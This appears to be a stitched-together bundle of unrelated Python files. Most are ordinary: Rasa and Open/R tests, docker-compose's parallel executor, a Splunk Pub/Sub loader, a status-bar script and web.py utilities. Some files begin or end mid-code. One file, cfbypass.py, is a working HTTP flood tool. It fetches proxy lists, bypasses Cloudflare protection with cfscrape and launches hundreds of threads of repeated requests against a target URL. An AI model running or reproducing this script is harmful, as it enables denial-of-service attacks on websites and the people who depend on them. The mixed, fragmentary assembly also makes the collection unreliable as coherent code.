[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
|
parallel.py
|
import _thread as thread
import logging
import operator
import sys
from queue import Empty
from queue import Queue
from threading import Lock
from threading import Semaphore
from threading import Thread
from docker.errors import APIError
from docker.errors import ImageNotFound
from compose.cli.colors import AnsiMode
from compose.cli.colors import green
from compose.cli.colors import red
from compose.cli.signals import ShutdownException
from compose.const import PARALLEL_LIMIT
from compose.errors import CompletedUnsuccessfully
from compose.errors import HealthCheckFailed
from compose.errors import NoHealthCheckConfigured
from compose.errors import OperationFailedError
log = logging.getLogger(__name__)
STOP = object()
class GlobalLimit:
"""Simple class to hold a global semaphore limiter for a project. This class
should be treated as a singleton that is instantiated when the project is.
"""
global_limiter = Semaphore(PARALLEL_LIMIT)
@classmethod
def set_global_limit(cls, value):
if value is None:
value = PARALLEL_LIMIT
cls.global_limiter = Semaphore(value)
def parallel_execute_watch(events, writer, errors, results, msg, get_name, fail_check):
""" Watch events from a parallel execution, update status and fill errors and results.
Returns exception to re-raise.
"""
error_to_reraise = None
for obj, result, exception in events:
if exception is None:
if fail_check is not None and fail_check(obj):
writer.write(msg, get_name(obj), 'failed', red)
else:
writer.write(msg, get_name(obj), 'done', green)
results.append(result)
elif isinstance(exception, ImageNotFound):
# This is to bubble up ImageNotFound exceptions to the client so we
# can prompt the user if they want to rebuild.
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
error_to_reraise = exception
elif isinstance(exception, APIError):
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, (OperationFailedError, HealthCheckFailed, NoHealthCheckConfigured,
CompletedUnsuccessfully)):
errors[get_name(obj)] = exception.msg
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, UpstreamError):
writer.write(msg, get_name(obj), 'error', red)
else:
errors[get_name(obj)] = exception
error_to_reraise = exception
return error_to_reraise
def parallel_execute(objects, func, get_name, msg, get_deps=None, limit=None, fail_check=None):
"""Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
get_deps called on object must return a collection with its dependencies.
get_name called on object must return its name.
fail_check is an additional failure check for cases that should display as a failure
in the CLI logs, but don't raise an exception (such as attempting to start 0 containers)
"""
objects = list(objects)
stream = sys.stderr
writer = ParallelStreamWriter.get_or_assign_instance(ParallelStreamWriter(stream))
for obj in objects:
writer.add_object(msg, get_name(obj))
for obj in objects:
writer.write_initial(msg, get_name(obj))
events = parallel_execute_iter(objects, func, get_deps, limit)
errors = {}
results = []
error_to_reraise = parallel_execute_watch(
events, writer, errors, results, msg, get_name, fail_check
)
for obj_name, error in errors.items():
stream.write("\nERROR: for {} {}\n".format(obj_name, error))
if error_to_reraise:
raise error_to_reraise
return results, errors
def _no_deps(x):
return []
class State:
"""
Holds the state of a partially-complete parallel operation.
state.started: objects being processed
state.finished: objects which have been processed
state.failed: objects which either failed or whose dependencies failed
"""
def __init__(self, objects):
self.objects = objects
self.started = set()
self.finished = set()
self.failed = set()
def is_done(self):
return len(self.finished) + len(self.failed) >= len(self.objects)
def pending(self):
return set(self.objects) - self.started - self.finished - self.failed
class NoLimit:
def __enter__(self):
pass
def __exit__(self, *ex):
pass
def parallel_execute_iter(objects, func, get_deps, limit):
"""
Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
Returns an iterator of tuples which look like:
# if func returned normally when run on object
(object, result, None)
# if func raised an exception when run on object
(object, None, exception)
# if func raised an exception when run on one of object's dependencies
(object, None, UpstreamError())
"""
if get_deps is None:
get_deps = _no_deps
if limit is None:
limiter = NoLimit()
else:
limiter = Semaphore(limit)
results = Queue()
state = State(objects)
while True:
feed_queue(objects, func, get_deps, results, state, limiter)
try:
event = results.get(timeout=0.1)
except Empty:
continue
# See https://github.com/docker/compose/issues/189
except thread.error:
raise ShutdownException()
if event is STOP:
break
obj, _, exception = event
if exception is None:
log.debug('Finished processing: {}'.format(obj))
state.finished.add(obj)
else:
log.debug('Failed: {}'.format(obj))
state.failed.add(obj)
yield event
def producer(obj, func, results, limiter):
"""
The entry point for a producer thread which runs func on a single object.
Places a tuple on the results queue once func has either returned or raised.
"""
with limiter, GlobalLimit.global_limiter:
try:
result = func(obj)
results.put((obj, result, None))
except Exception as e:
results.put((obj, None, e))
def feed_queue(objects, func, get_deps, results, state, limiter):
"""
Starts producer threads for any objects which are ready to be processed
(i.e. they have no dependencies which haven't been successfully processed).
Shortcuts any objects whose dependencies have failed and places an
(object, None, UpstreamError()) tuple on the results queue.
"""
pending = state.pending()
log.debug('Pending: {}'.format(pending))
for obj in pending:
deps = get_deps(obj)
try:
if any(dep[0] in state.failed for dep in deps):
log.debug('{} has upstream errors - not processing'.format(obj))
results.put((obj, None, UpstreamError()))
state.failed.add(obj)
elif all(
dep not in objects or (
dep in state.finished and (not ready_check or ready_check(dep))
) for dep, ready_check in deps
):
log.debug('Starting producer thread for {}'.format(obj))
t = Thread(target=producer, args=(obj, func, results, limiter))
t.daemon = True
t.start()
state.started.add(obj)
except (HealthCheckFailed, NoHealthCheckConfigured) as e:
log.debug(
'Healthcheck for service(s) upstream of {} failed - '
'not processing'.format(obj)
)
results.put((obj, None, e))
except CompletedUnsuccessfully as e:
log.debug(
'Service(s) upstream of {} did not completed successfully - '
'not processing'.format(obj)
)
results.put((obj, None, e))
if state.is_done():
results.put(STOP)
class UpstreamError(Exception):
pass
class ParallelStreamWriter:
"""Write out messages for operations happening in parallel.
Each operation has its own line, and ANSI code characters are used
to jump to the correct line, and write over the line.
"""
default_ansi_mode = AnsiMode.AUTO
write_lock = Lock()
instance = None
instance_lock = Lock()
@classmethod
def get_instance(cls):
return cls.instance
@classmethod
def get_or_assign_instance(cls, writer):
cls.instance_lock.acquire()
try:
if cls.instance is None:
cls.instance = writer
return cls.instance
finally:
cls.instance_lock.release()
@classmethod
def set_default_ansi_mode(cls, ansi_mode):
cls.default_ansi_mode = ansi_mode
def __init__(self, stream, ansi_mode=None):
if ansi_mode is None:
ansi_mode = self.default_ansi_mode
self.stream = stream
self.use_ansi_codes = ansi_mode.use_ansi_codes(stream)
self.lines = []
self.width = 0
def add_object(self, msg, obj_index):
if msg is None:
return
self.lines.append(msg + obj_index)
self.width = max(self.width, len(msg + ' ' + obj_index))
def write_initial(self, msg, obj_index):
if msg is None:
return
return self._write_noansi(msg, obj_index, '')
def _write_ansi(self, msg, obj_index, status):
self.write_lock.acquire()
position = self.lines.index(msg + obj_index)
diff = len(self.lines) - position
# move up
self.stream.write("%c[%dA" % (27, diff))
# erase
self.stream.write("%c[2K\r" % 27)
self.stream.write("{:<{width}} ... {}\r".format(msg + ' ' + obj_index,
status, width=self.width))
# move back down
self.stream.write("%c[%dB" % (27, diff))
self.stream.flush()
self.write_lock.release()
def _write_noansi(self, msg, obj_index, status):
self.stream.write(
"{:<{width}} ... {}\r\n".format(
msg + ' ' + obj_index, status, width=self.width
)
)
self.stream.flush()
def write(self, msg, obj_index, status, color_func):
if msg is None:
return
if self.use_ansi_codes:
self._write_ansi(msg, obj_index, color_func(status))
else:
self._write_noansi(msg, obj_index, status)
def parallel_operation(containers, operation, options, message):
parallel_execute(
containers,
operator.methodcaller(operation, **options),
operator.attrgetter('name'),
message,
)
def parallel_remove(containers, options):
stopped_containers = [c for c in containers if not c.is_running]
parallel_operation(stopped_containers, 'remove', options, 'Removing')
def parallel_pause(containers, options):
parallel_operation(containers, 'pause', options, 'Pausing')
def parallel_unpause(containers, options):
parallel_operation(containers, 'unpause', options, 'Unpausing')
def parallel_kill(containers, options):
parallel_operation(containers, 'kill', options, 'Killing')
|
Chap10_Example10.40.py
|
from threading import *
from queue import Queue
from time import sleep
import random
def myproducer():
for i in range(5):
item = random.randint(1, 100)
print(f"Item No. {i} produced by producer is: ", item)
myqueue_obj.put(item)
print("Notification given by the producer")
sleep(1)
def myconsumer():
print("Waiting for updation by consumer")
for i in range(5):
sleep(1)
print(f"The item no. {i} consumed by the consumer is: ", myqueue_obj.get())
myqueue_obj = Queue()
myt1 = Thread(target=myproducer)
myt2 = Thread(target=myconsumer)
myt1.start()
|
google_pubsub_data_loader.py
|
import traceback
import time
from splunktalib.common import log
logger = log.Logs().get_logger("main")
import google_ta_common.google_consts as ggc
import pubsub_mod.google_pubsub_consts as gpc
import google_wrapper.pubsub_wrapper as gpw
class GooglePubSubDataLoader(object):
def __init__(self, config):
"""
:config: dict object
{
"appname": xxx,
"use_kv_store": xxx,
"proxy_url": xxx,
"proxy_port": xxx,
"proxy_username": xxx,
"proxy_password": xxx,
"proxy_rdns": xxx,
"proxy_type": xxx,
"google_credentials": xxx,
"google_project": xxx,
"google_subscription": xxx,
"index": xxx,
}
"""
self._config = config
self._source = "{project}:{subscription}".format(
project=self._config[ggc.google_project],
subscription=self._config[gpc.google_subscription])
self._running = False
self._stopped = False
def get_interval(self):
return self._config[ggc.polling_interval]
def stop(self):
self._stopped = True
logger.info("Stopping GooglePubSubDataLoader")
def __call__(self):
self.index_data()
def index_data(self):
if self._running:
return
self._running = True
logger.info("Start collecting data for project=%s, subscription=%s",
self._config[ggc.google_project],
self._config[gpc.google_subscription])
while not self._stopped:
try:
self._do_safe_index()
except Exception:
logger.error(
"Failed to collect data for project=%s, subscription=%s, "
"error=%s", self._config[ggc.google_project],
self._config[gpc.google_subscription],
traceback.format_exc())
time.sleep(2)
continue
logger.info("End of collecting data for project=%s, subscription=%s",
self._config[ggc.google_project],
self._config[gpc.google_subscription])
def _do_safe_index(self):
msgs_metrics = {
"current_record_count": 0,
"record_report_threshhold": 1000000,
"record_report_start": time.time()
}
sub = gpw.GooglePubSub(logger, self._config)
while not self._stopped:
for msgs in sub.pull_messages():
if msgs:
self._index_messages(msgs, msgs_metrics)
sub.ack_messages(msgs)
self._running = False
def _index_messages(self, msgs, msgs_metrics):
msgs_metrics["current_record_count"] += len(msgs)
current_count = msgs_metrics["current_record_count"]
if current_count >= msgs_metrics["record_report_threshhold"]:
logger.info(
"index %s events for project=%s, subscription=%s takes "
"time=%s", self._config[ggc.google_project],
self._config[gpc.google_subscription], current_count,
time.time() - msgs_metrics["record_report_start"])
msgs_metrics["record_report_start"] = time.time()
msgs_metrics["current_record_count"] = 0
self._write_events(msgs)
def _write_events(self, msgs):
msgs = [msg["message"] for msg in msgs]
events = self._config[ggc.event_writer].create_events(
index=self._config[ggc.index], host=None, source=self._source,
sourcetype="google:pubsub", time=None, unbroken=False, done=False,
events=msgs)
while not self._stopped:
try:
self._config[ggc.event_writer].write_events(events, retry=1)
except Exception:
logger.error(
"Failed to index events for project=%s, subscription=%s, "
"error=%s", self._config[ggc.google_project],
self._config[gpc.google_subscription],
traceback.format_exc())
time.sleep(2)
if __name__ == "__main__":
import sys
import os
import logging
import threading
class O(object):
def write_events(self, index, source, sourcetype, events):
for event in events:
sys.stdout.write(event)
sys.stdout.write("\n")
logger = logging.getLogger("google")
ch = logging.StreamHandler()
logger.addHandler(ch)
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "zlchenken-78c88c5c115b.json"
config = {
ggc.data_loader: O(),
ggc.event_writer: O(),
ggc.checkpoint_dir: ".",
ggc.server_uri: "https://localhost:8089",
ggc.server_host: "localhost",
ggc.index: "main",
ggc.google_project: "zlchenken",
gpc.google_topic: "test_topic",
gpc.google_subscription: "sub_test_topic",
gpc.batch_count: 10,
gpc.base64encoded: True,
}
def pub():
ps = gpw.GooglePubSub(logger, config)
for i in range(10):
messages = ["i am counting {} {}".format(i, j) for j in range(10)]
ps.publish_messages(messages)
time.sleep(1)
pubthr = threading.Thread(target=pub)
pubthr.start()
loader = GooglePubSubDataLoader(config)
subthr = threading.Thread(target=loader.index_data)
subthr.start()
pubthr.join()
time.sleep(1)
loader.stop()
subthr.join()
# import cProfile
# import pstats
# import cStringIO
#
# pr = cProfile.Profile()
# pr.enable()
#
# pr.disable()
# s = cStringIO.StringIO()
# sortby = 'cumulative'
# ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
# ps.print_stats()
# print s.getvalue()
|
cfbypass.py
|
import cfscrape
import os
import random
import time
import requests
import threading
import cloudscraper
from colorama import Fore
print(Fore.YELLOW + """
____ _____ ______ ______ _ ____ ____
/ ___| ___| | __ ) \ / / _ \ / \ / ___/ ___|
| | | |_ | _ \\ V /| |_) / _ \ \___ \___ \ \r
| |___| _| | |_) || | | __/ ___ \ ___) |__) |
\____|_| |____/ |_| |_| /_/ \_\____/____/
""")
print("Code By GogoZin -2019/8/12")
def opth():
for a in range(thr):
x = threading.Thread(target=atk)
x.start()
print("Threads " + str(a+1) + " Created ")
print(Fore.RED + "Wait A Few Seconds For Threads Ready To Attack ...")
time.sleep(10)
input(Fore.CYAN + "Press Enter To Launch Attack !")
global oo
oo = True
oo = False
def main():
global url
global list
global pprr
global thr
global per
list = str('proxies.txt')
pprr = open(list).readlines()
print(Fore.GREEN + "Proxies Count : " + Fore.WHITE + "%d" %len(pprr))
url = str(input(Fore.GREEN + "Url : " + Fore.WHITE))
scraper = cfscrape.create_scraper() # returns a CloudflareScraper instance
# Or: scraper = cfscrape.CloudflareScraper() # CloudflareScraper inherits from requests.Session
tokens, user_agent = cfscrape.get_tokens(url)
print(tokens, user_agent)
return
ssl = str(input(Fore.GREEN + "Enable SSL Mode ? (y/n) : " + Fore.WHITE))
ge = str(input(Fore.GREEN + "Get New Proxies List ? (y/n) : " + Fore.WHITE))
if ge =='y':
if ssl == 'y':
rsp = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all&anonymity=all&ssl=yes&timeout=2000') #Code By GogoZin
with open('proxies.txt','wb') as fp:
fp.write(rsp.content)
print(Fore.CYAN + "Sucess Get Https Proxies List !")
else:
rsp = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all&anonymity=all&ssl=all&timeout=1000') #Code By GogoZin
with open('proxies.txt','wb') as fp:
fp.write(rsp.content)
print(Fore.CYAN + "Sucess Get Http Proxies List !")
else:
pass
thr = int(input(Fore.GREEN + "Threads (1-400 Default Is 300) : " + Fore.WHITE))
per = int(input(Fore.GREEN + "CC.Power (1-100 Default Is 70) : " + Fore.WHITE))
opth()
def atk():
pprr = open(list).readlines()
proxy = random.choice(pprr).strip().split(":")
s = cfscrape.create_scraper()
s.proxies = {}
s.proxies['http'] = 'http://'+str(proxy[0])+":"+str(proxy[1])
s.proxies['https'] = 'https://'+str(proxy[0])+":"+str(proxy[1])
time.sleep(5)
while True:
while oo:
try:
s.get(url)
print(Fore.CYAN + "Bypass -> " + Fore.WHITE + str(url)+ Fore.CYAN + " From~# " +Fore.WHITE+ str(proxy[0])+":"+str(proxy[1]))
try:
for g in range(per):
s.get(url)
print(Fore.CYAN + "Bypass -> " + Fore.WHITE + str(url)+Fore.CYAN + " From~# " +Fore.WHITE + str(proxy[0])+":"+str(proxy[1])) #code By GogoZin
s.close()
except:
s.close()
except:
s.close()
print(Fore.RED + "Can't Connect To Proxies Or Url ! u:" + url + " | proxy:" + s.proxies['https'])
if __name__ == "__main__":
main()
|
main.py
|
import subprocess, threading, time, importlib, sys, requests
import config
threads = []
def block_tup_to_class(tup):
block_module = importlib.import_module('commands.' + tup[0])
block = block_module.Block(tup[3])
block.type = tup[0]
block.icon = tup[1]
block.interval = tup[2]
return block
blocks = list(map(block_tup_to_class, config.blocks))
def setroot(name):
name = name + config.suffix
return subprocess.run(["xsetroot", "-name", name])
def block_fn(block):
t = threading.currentThread()
if not block:
return stop_threads()
while getattr(t, "do_run", True):
block.fetch()
time.sleep(block.interval / 1000)
def create_blocks_threads():
global threads
stop_threads()
threads = []
for block in blocks:
t = threading.Thread(
target=block_fn,
daemon=True,
args=[block] # have to use either [block] or (block,)
)
t.start()
threads.append(t)
def block_to_str(block):
prefix = block.get_icon() if block.override_icon else block.icon
content = block.content
return prefix + content
def stop_threads():
for t in threads:
t.do_run = False
for t in threads:
if not t.is_alive():
t.join() # Waits until thread terminates
def construct_multi_price_url(inputs, outputs):
return f'''https://min-api.cryptocompare.com/data/pricemulti?fsyms={','.join(inputs)}&tsyms={','.join(outputs)}'''
def fetch_crypto_fn():
url = construct_multi_price_url(config.crypto_currencies, [config.fiat_currency])
crypto_module = importlib.import_module('commands.crypto')
t = threading.currentThread()
while getattr(t, "do_run", True):
res = requests.get(url)
data = res.json()
crypto_module.Block.cache = data
time.sleep(config.crypto_interval / 1000)
def create_crypto_thread():
t = threading.Thread(
target=fetch_crypto_fn,
daemon=True
)
t.start()
threads.append(t)
def main():
create_blocks_threads()
if len(config.crypto_currencies) != 0:
create_crypto_thread()
def setter_thread_fn():
t = threading.currentThread()
while getattr(t, "do_run", True):
blocks_strs = map(block_to_str, blocks)
root_str = config.delimeter.join(blocks_strs)
print(root_str)
if '--no-setroot' not in sys.argv:
setroot(root_str)
time.sleep(config.interval / 1000)
global threads
t = threading.Thread(target=setter_thread_fn, daemon=True, name='setter_thread')
t.start()
threads.append(t)
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print("Recieved SIGINT, stopping xblocks")
stop_threads()
break
if __name__ == "__main__":
main()
import sys
sys.exit()
import subprocess, threading, requests, json, datetime, time, importlib, sys
config = importlib.import_module('config')
blocks_cached_data = {}
threads = []
def reload_config():
global config
config = importlib.import_module('config')
def setroot(name):
reload_config()
name = name + config.suffix
return subprocess.run(["xsetroot", "-name", name])
def get_clock_icon():
clock_pos = datetime.datetime.now().strftime("%I")
if clock_pos == "00": clock_icon = "🕛"
elif clock_pos == "01": clock_icon = "🕐"
elif clock_pos == "02": clock_icon = "🕑"
elif clock_pos == "03": clock_icon = "🕒"
elif clock_pos == "04": clock_icon = "🕓"
elif clock_pos == "05": clock_icon = "🕔"
elif clock_pos == "06": clock_icon = "🕕"
elif clock_pos == "07": clock_icon = "🕖"
elif clock_pos == "08": clock_icon = "🕗"
elif clock_pos == "09": clock_icon = "🕘"
elif clock_pos == "10": clock_icon = "🕙"
elif clock_pos == "11": clock_icon = "🕚"
elif clock_pos == "12": clock_icon = "🕛"
else: clock_icon = "❌"
return clock_icon
def block_to_str(block):
prefix = block[2] if config.use_emoji else block[1]
temp_blocks_cache = blocks_cached_data
if 'crypto' in temp_blocks_cache:
temp_blocks_cache.pop('crypto')
content = temp_blocks_cache.get(block[0], 'Loading')
if type(content) == tuple:
content = content[0]
if prefix == '{}' and block[0] == 'time':
prefix = prefix.format(get_clock_icon())
return prefix + content
def construct_multi_price_url(inputs, outputs):
return f'''https://min-api.cryptocompare.com/data/pricemulti?fsyms={','.join(inputs)}&tsyms={','.join(outputs)}'''
def create_listener_thread(listener):
t = threading.Thread(
target=listener['function'],
daemon=True,
name=listener.get('name', 'Generic listener thread'),
args=listener.get('args', None)
)
return t
def block_fn(block):
t = threading.currentThread()
if not block:
return do_exit()
while getattr(t, "do_run", True):
# TODO do stuff here
if callable(block[0]):
blocks_cached_data[block[0]] = block[0]()
elif 'price ' in block[0]:
# is crypto handler
cryptos_cache = blocks_cached_data.get('price', 'Loading')
if cryptos_cache == 'Loading':
crypto_price = cryptos_cache
else:
# crypto_price = cryptos_cache[0].get(config.fiat_currency.upper(), {})
# crypto_price = crypto_price.get(block[0].replace('price ', '').upper(), 'Error!')
crypto_price = cryptos_cache[0].get(block[0].replace('price ', '').upper(), {})
crypto_price = crypto_price.get(config.fiat_currency.upper(), 'Error!')
crypto_price = f'{config.fiat_currency_prefix}{crypto_price}'
crypto_price = f'{crypto_price}{config.fiat_currency_suffix}'
blocks_cached_data[block[0]] = (crypto_price, datetime.datetime.now())
elif 'cmd ' in block[0]:
command = block[0].replace('cmd ', '')
proc = subprocess.run(["bash", "-c", command], capture_output=True)
raw_output = proc.stdout
output_str = raw_output.decode('utf-8')
blocks_cached_data[block[0]] = output_str
elif block[0] == 'time':
blocks_cached_data[block[0]] = time.strftime('%H:%M:%S')
elif block[0] == 'date':
blocks_cached_data[block[0]] = datetime.date.today().strftime('%d.%m.%Y')
elif block[0] == 'datetime':
blocks_cached_data[block[0]] = datetime.datetime.now().strftime('%d.%m.%Y %H:%M:%S')
else:
pass # is invalid
time.sleep(block[3] / 1000)
if config.debug:
print("Stopped " + t.name + " thread.")
def fetch_fn(options):
name = options['name']
get_url = options['get_url']
use_json = options['use_json']
cache_key = options['cache_key']
get_interval = options['get_interval']
if config.debug:
print('Fetch thread ' + name + ' started')
t = threading.currentThread()
while getattr(t, "do_run", True):
def get_data():
if config.debug:
print('Fetch thread ' + name + ' getting data')
global blocks_cached_data
url = get_url()
res = requests.get(url)
data = res.json() if use_json else res.text
blocks_cached_data[cache_key] = (data, datetime.datetime.now())
def check_get():
if not blocks_cached_data.get(cache_key):
return get_data()
# diff between last request and right now
time_diff = (datetime.datetime.now() - blocks_cached_data[cache_key][1])
time_diff_ms = time_diff.total_seconds() * 1000
# if more diff than interval
if time_diff_ms > get_interval():
return get_data()
time.sleep(1)
check_get()
if config.debug:
print('Stopped ' + name + ' thread.')
def create_crypto_thread():
def get_crypto_url():
reload_config()
return construct_multi_price_url(config.crypto_currencies, [config.fiat_currency])
def get_crypto_interval():
reload_config()
return config.crypto_interval
t = create_listener_thread({
'function': fetch_fn,
'name': 'crypto',
'args': [{
'name': 'crypto',
'get_url': get_crypto_url,
'cache_key': 'price',
'get_interval': get_crypto_interval,
'use_json': True,
}],
})
t.start()
threads.append(t)
def create_weather_thread():
def get_weather_interval():
reload_config()
return config.weather_interval
t = create_listener_thread({
'function': fetch_fn,
'name': 'crypto',
'args': [{
'name': 'weather',
'get_url': lambda: 'https://wttr.in/' + config.weather_location + '?format=%t',
'cache_key': 'weather',
'get_interval': get_weather_interval,
'use_json': False,
}],
})
t.start()
threads.append(t)
def create_blocks_threads():
global threads
stop_threads()
threads = []
for block in config.blocks:
t = create_listener_thread({
'function': block_fn,
'name': block[1],
'args': [block] # have to use either [block] or (block,)
})
t.start()
threads.append(t)
def stop_threads():
for t in threads:
if config.debug:
print("Trying to stop " + t.name + " thread.")
t.do_run = False
for t in threads:
if not t.is_alive():
t.join() # Waits until thread terminates
def do_exit():
if config.debug:
print("Trying to stop listener threads.")
stop_threads()
if config.debug:
print("Stopped listener threads.")
print("Trying to stop main thread.")
setter_thread.do_run = False
setter_thread.join() # Waits until thread terminates
if __name__ == "__main__":
create_blocks_threads()
if len(config.crypto_currencies) > 0:
create_crypto_thread()
if config.fetch_weather:
create_weather_thread()
def setter_thread_fn():
t = threading.currentThread()
while getattr(t, "do_run", True):
blocks_strs = map(block_to_str, config.blocks)
root_str = config.delimeter.join(blocks_strs)
print(root_str)
if '--no-setroot' not in sys.argv:
setroot(root_str)
time.sleep(1)
if config.debug:
print("Stopped main thread.")
setter_thread = threading.Thread(target=setter_thread_fn, daemon=True, name='setter_thread')
setter_thread.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print("Recieved SIGINT, stopping xblocks")
if config.debug:
print("Cache:", blocks_cached_data)
print("Threads:", threads)
do_exit()
break
|
prefix_mgr_client_tests.py
|
#!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.clients import prefix_mgr_client
from openr.PrefixManager import ttypes as prefix_mgr_types
from openr.Lsdb import ttypes as lsdb_types
from openr.cli.utils.utils import ip_str_to_prefix, sprint_prefix
import zmq
import unittest
from multiprocessing import Process
prefix_entry1 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:1/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry2 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:2/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry3 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:3/128'),
type=lsdb_types.PrefixType.LOOPBACK)
class PrefixMgr():
def __init__(self, zmq_ctx, url):
self._prefix_mgr_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._prefix_mgr_server_socket.bind(url)
self._prefix_map = {sprint_prefix(prefix_entry1.prefix): prefix_entry1,
sprint_prefix(prefix_entry2.prefix): prefix_entry2,
sprint_prefix(prefix_entry3.prefix): prefix_entry3}
def process_request(self):
req = self._prefix_mgr_server_socket.recv_thrift_obj(
prefix_mgr_types.PrefixManagerRequest)
if req.cmd == prefix_mgr_types.PrefixManagerCommand.ADD_PREFIXES:
for prefix_entry in req.prefixes:
self._prefix_map[sprint_prefix(prefix_entry.prefix)] = prefix_entry
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=True))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.WITHDRAW_PREFIXES:
success = False
for prefix_entry in req.prefixes:
prefix_str = sprint_prefix(prefix_entry.prefix)
if prefix_str in self._prefix_map:
del self._prefix_map[prefix_str]
success = True
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=success))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.GET_ALL_PREFIXES:
resp = prefix_mgr_types.PrefixManagerResponse()
resp.prefixes = self._prefix_map.values()
resp.success = True
self._prefix_mgr_server_socket.send_thrift_obj(resp)
class TestPrefixMgrClient(unittest.TestCase):
def test(self):
socket_url = "inproc://prefix-manager-url"
PrefixMgr(zmq.Context(), socket_url)
num_req = 5
def _prefix_mgr_server():
prefix_mgr_server = PrefixMgr(zmq.Context(), socket_url)
for _ in range(num_req):
prefix_mgr_server.process_request()
def _prefix_mgr_client():
prefix_mgr_client_inst = prefix_mgr_client.PrefixMgrClient(
zmq.Context(), socket_url)
resp = prefix_mgr_client_inst.add_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'], 'LOOPBACK')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
prefix_entry4 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:4/128'),
type=lsdb_types.PrefixType.LOOPBACK)
self.assertTrue(resp.success)
self.assertTrue(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'])
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
self.assertTrue(resp.success)
self.assertFalse(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:5/128'])
self.assertFalse(resp.success)
p = Process(target=_prefix_mgr_server)
p.start()
q = Process(target=_prefix_mgr_client)
q.start()
p.join()
q.join()
|
utils.py
|
#!/usr/bin/env python
"""
General Utilities
(part of web.py)
"""
__all__ = [
"Storage", "storage", "storify",
"iters",
"rstrips", "lstrips", "strips",
"safeunicode", "safestr", "utf8",
"TimeoutError", "timelimit",
"Memoize", "memoize",
"re_compile", "re_subm",
"group",
"IterBetter", "iterbetter",
"dictreverse", "dictfind", "dictfindall", "dictincr", "dictadd",
"listget", "intget", "datestr",
"numify", "denumify", "commify", "dateify",
"nthstr",
"CaptureStdout", "capturestdout", "Profile", "profile",
"tryall",
"ThreadedDict", "threadeddict",
"autoassign",
"to36",
"safemarkdown",
"sendmail"
]
import re, sys, time, threading
try:
import subprocess
except ImportError:
subprocess = None
try: import datetime
except ImportError: pass
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError, k:
raise AttributeError, k
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError, k:
raise AttributeError, k
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
d doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
